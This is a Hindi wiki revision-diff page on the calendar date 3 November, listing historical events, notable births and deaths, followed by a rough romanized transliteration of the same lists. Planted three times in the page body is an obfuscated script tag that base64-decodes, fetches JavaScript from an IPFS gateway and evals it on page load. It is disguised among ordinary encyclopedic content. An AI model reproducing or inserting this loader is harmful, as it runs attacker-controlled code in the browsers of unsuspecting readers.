Difference between revisions of "3 नवंबर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(27 intermediate revisions by 6 users not shown)
Line 1: Line 1:
 
{{कैलंडर}}
 
{{कैलंडर}}
  
[[ग्रेगोरी कैलंडर]] के अनुसार 3 नवंबर [[वर्ष]] का 307 वाँ ([[लीप वर्ष]] में यह 308 वाँ) दिन है। साल मे अभी और 58 दिन शेष हैं।
+
[[ग्रेगोरी कैलंडर]] के अनुसार 3 नवंबर [[वर्ष]] का 307 वाँ ([[लीप वर्ष]] में यह 308 वाँ) दिन है। साल में अभी और 58 दिन शेष हैं।
  
 
==3 नवंबर की महत्त्वपूर्ण घटनाएँ==
 
==3 नवंबर की महत्त्वपूर्ण घटनाएँ==
* [[2008]]- यूनियन बैंक ऑफ़ इंडिया ने अपनी उधारी दरों में 0.5 प्रतिशत की कमी की।
+
* 644 - ईसा पश्चात् - दूसरे मुस्लिम खलीफा उमर इब्न अल खत्ताब की मदीना में एक फारसी गुलाम ने हत्या कर दी।
 +
* 1394 - [[फ्रांस]] के सम्राट चार्ल्स षष्ठम ने यहूदियाें को फ्रांस से बाहर खदेड़ दिया।
 +
* 1493 - क्रिस्टोफर कोलंबस ने डोमिनिका द्वीप की खोज की।
 +
* 1655 - [[इंग्लैंड]] और फ्रांस ने सैन्य और आर्थिक समझौतों पर हस्ताक्षर किये।
 +
* 1762 - [[ब्रिटेन]] और स्पेन के बीच पेरिस की संधि हुई।
 +
* 1796 - जॉन एडम्स [[अमेरिका]] के राष्ट्रपति चुने गये।
 +
* [[1857]] - नानाराव की मथुरा स्थित संपत्ति को ध्वस्त करने के लिये के आदेश-
 +
* [[1869]] - कनाडा में हैमिल्टन फुटबाॅल क्लब अस्तित्व में आया।
 +
* [[1903]] - पनामा को कोलंबिया से आजादी मिली।
 +
* [[1938]] - ‘असम हिन्दी प्रचार समिति’ नामक एक संस्था कायम की गई।
 +
* [[1948]] - भारत के तत्कालीन प्रधानमंत्री जवाहर लाल नेहरू ने संयुक्त राष्ट्र महासभा में अपना पहला भाषण दिया।
 +
* [[1958]] - तत्कालीन सोवियत संघ ने परमाणु परीक्षण किया।
 +
* [[1962]] - [[चीन]] के हमले के मद्देनजर [[भारत]] में गोल्ड बाॅन्ड स्कीम की घाेषणा की गयी।
 +
* [[1984]] - भारत में सिख विरोधी दंगों में तीन हजार से ज्यादा लोग मारे गए।
 +
* [[1988]] - वायु सेना ने आगरा से एक पैराशूट बटालियन समूह को लिया।
 +
**भारतीय सशस्त्र सेना ने मालदीव में हुए एक सैन्य विद्रोह को दबाने में वहाँ की सरकार की सहायता के लिए एक अभियान शुरू किया।
 +
* [[1997]] - जी-15 समूह का सातवां शिखर सम्मेलन [[कुआलालम्पुर]] में प्रारम्भ।
 +
* [[2000]] - भारत सरकार द्वारा डायरेक्ट टू होम प्रसारण सेवा सभी के लिये शुरू की गयी।
 +
* [[2001]] - अमेरिका ने लश्कर व जैश-ए-मोहम्मद पर प्रतिबंध लगाया।
 +
* [[2002]] - नखोम पाथोम की बैठक में लिट्टे ने राजनीति की मुख्य धारा में शामिल होने की इच्छा व्यक्त की।
 +
* [[2003]] - पाकिस्तान और चीन के बीच बीजिंग में आठ समझौतों पर हस्ताक्षर।
 +
* [[2006]] - भारत बेल्जियम के साथ सामाजिक सुरक्षा गारंटी पर समझौता हुआ।
 +
* [[2007]] - पाकिस्तान पीपुल्स पार्टी की प्रमुख बेनजीर भुट्टो को उनके घर में नजरबन्द किया गया।
 +
**पाकिस्तान में परवेज मुशर्रफ ने संविधान को रद्द कर और सुप्रीम कोर्ट के मुख्य न्यायाधीश को हटाकर आपातकाल की घोषणा की।
 +
* [[2008]] - यूनियन बैंक ऑफ़ इंडिया ने अपनी उधारी दरों में 0.5 प्रतिशत की कमी की।
 +
* [[2011]] - फ्रांस के कैन्स में जी-20 शिखर सम्मेलन शुरू हुआ जिसमें यूरोजोन ऋण संकट पर चर्चा की गई।
 +
* [[2014]] - अमेरिका में आतंकवादी हमले में वर्ल्ड ट्रेड सेंटर गिराये जाने के 13 साल बाद उसी जगह पर एक वर्ल्ड ट्रेड सेंटर खोला गया।
 +
 
 
==3 नवंबर को जन्मे व्यक्ति==
 
==3 नवंबर को जन्मे व्यक्ति==
 +
* [[1976]] - [[मानवजीत सिंह संधू]] - भारतीय निशानेबाज़ हैं, जो मुख्यत: ट्रेप शूटिंग के लिए जाने जाते हैं।
 +
* [[1956]] - [[स्वामी चिन्ना जियर]]- ऐसी आध्यात्मिक शख्सियत हैं जिन्होंने अध्यात्म और समाज सेवा के क्षेत्र में देश-विदेश में काम किया है।
 +
* [[1933]] - [[अमर्त्य सेन]] - अर्थशास्त्री
 +
* [[1937]] - [[लक्ष्मीकांत]] - [[हिन्दी]] [[सिनेमा]] के प्रसिद्ध संगीतकार।
 +
* [[1906]] - [[पृथ्वीराज कपूर]] - [[हिंदी]] फ़िल्म और रंगमंच अभिनय के इतिहास पुरुष, जिन्होंने [[मुम्बई]] में 'पृथ्वी थिएटर' स्थापित किया।
 +
* [[1890]] - [[एच. जे. कनिया]] - स्वतंत्र [[भारत]] के प्रथम मुख्य न्यायाधीश थे।
 +
* 1688 - [[सवाई जयसिंह]] - [[आमेर]] का वीर और बहुत ही कूटनीतिज्ञ राजा था।
  
 
==3 नवंबर को हुए निधन==
 
==3 नवंबर को हुए निधन==
 +
* [[2013 ]] - [[रेशमा]], प्रसिद्ध लोक गायिका।
 +
* [[2008]] - [[ललित मोहन शर्मा]] - [[भारत]] के भूतपूर्व 24वें मुख्य न्यायाधीश थे।
 +
* [[1977]] - [[भगवंतराव मंडलोइ]] - [[मध्य प्रदेश]] के भूतपूर्व दूसरे [[मुख्यमंत्री]] थे।
 +
* [[1947]] - [[सोमनाथ शर्मा]] - '[[परमवीर चक्र]]' पाने वाले प्रथम भारतीय शहीद।
 +
* [[1947]] - [[दीवान सिंह दानू]] - '[[महावीर चक्र]]' से सम्मानित भारतीय सैनिक थे।
 +
* [[1936]] - [[चिदंबरम पिल्लई]] - [[तमिल भाषा]] के विद्वान् और प्रख्यात समाज-सुधारक।
  
 
==3 नवंबर के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==3 नवंबर के महत्त्वपूर्ण अवसर एवं उत्सव==
 
+
* अंतर्राष्ट्रीय रेड क्रास दिवस (सप्ताह)
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 +
* [http://www.univarta.com/history-of-the-03november-2016/today-in-history/news/673190.html univarta.com]
 
{{कैलंडर बाहरी कड़ियाँ}}
 
{{कैलंडर बाहरी कड़ियाँ}}
  

Latest revision as of 12:18, 12 July 2023

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 3 navanbar varsh ka 307 vaan (lip varsh mean yah 308 vaan) din hai. sal mean abhi aur 58 din shesh haian.

3 navanbar ki mahattvapoorn ghatanaean

  • 644 - eesa pashchath - doosare muslim khalipha umar ibn al khattab ki madina mean ek pharasi gulam ne hatya kar di.
  • 1394 - phraans ke samrat charls shashtham ne yahoodiyaean ko phraans se bahar khade d diya.
  • 1493 - kristophar kolanbas ne dominika dvip ki khoj ki.
  • 1655 - ianglaiand aur phraans ne sainy aur arthik samajhautoan par hastakshar kiye.
  • 1762 - briten aur spen ke bich peris ki sandhi huee.
  • 1796 - j aaun edams amerika ke rashtrapati chune gaye.
  • 1857 - nanarav ki mathura sthit sanpatti ko dhvast karane ke liye ke adesh-
  • 1869 - kanada mean haimiltan phutabaॅl klab astitv mean aya.
  • 1903 - panama ko kolanbiya se ajadi mili.
  • 1938 - ‘asam hindi prachar samiti’ namak ek sanstha kayam ki gee.
  • 1948 - bharat ke tatkalin pradhanamantri javahar lal neharoo ne sanyukt rashtr mahasabha mean apana pahala bhashan diya.
  • 1958 - tatkalin soviyat sangh ne paramanu parikshan kiya.
  • 1962 - chin ke hamale ke maddenajar bharat mean gold baॅnd skim ki ghaeshana ki gayi.
  • 1984 - bharat mean sikh virodhi dangoan mean tin hajar se jyada log mare ge.
  • 1988 - vayu sena ne agara se ek pairashoot bataliyan samooh ko liya.
    • bharatiy sashastr sena ne maladiv mean hue ek sainy vidroh ko dabane mean vahaan ki sarakar ki sahayata ke lie ek abhiyan shuroo kiya.
  • 1997 - ji-15 samooh ka satavaan shikhar sammelan kualalampur mean prarambh.
  • 2000 - bharat sarakar dvara dayarekt too hom prasaran seva sabhi ke liye shuroo ki gayi.
  • 2001 - amerika ne lashkar v jaish-e-mohammad par pratibandh lagaya.
  • 2002 - nakhom pathom ki baithak mean litte ne rajaniti ki mukhy dhara mean shamil hone ki ichchha vyakt ki.
  • 2003 - pakistan aur chin ke bich bijiang mean ath samajhautoan par hastakshar.
  • 2006 - bharat beljiyam ke sath samajik suraksha garanti par samajhauta hua.
  • 2007 - pakistan pipuls parti ki pramukh benajir bhutto ko unake ghar mean najaraband kiya gaya.
    • pakistan mean paravej musharraph ne sanvidhan ko radd kar aur suprim kort ke mukhy nyayadhish ko hatakar apatakal ki ghoshana ki.
  • 2008 - yooniyan baiank aauf iandiya ne apani udhari daroan mean 0.5 pratishat ki kami ki.
  • 2011 - phraans ke kains mean ji-20 shikhar sammelan shuroo hua jisamean yoorojon rrin sankat par charcha ki gee.
  • 2014 - amerika mean atankavadi hamale mean varld tred seantar giraye jane ke 13 sal bad usi jagah par ek varld tred seantar khola gaya.

3 navanbar ko janme vyakti

3 navanbar ko hue nidhan

3 navanbar ke mahattvapoorn avasar evan utsav

  • aantarrashtriy red kras divas (saptah)

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>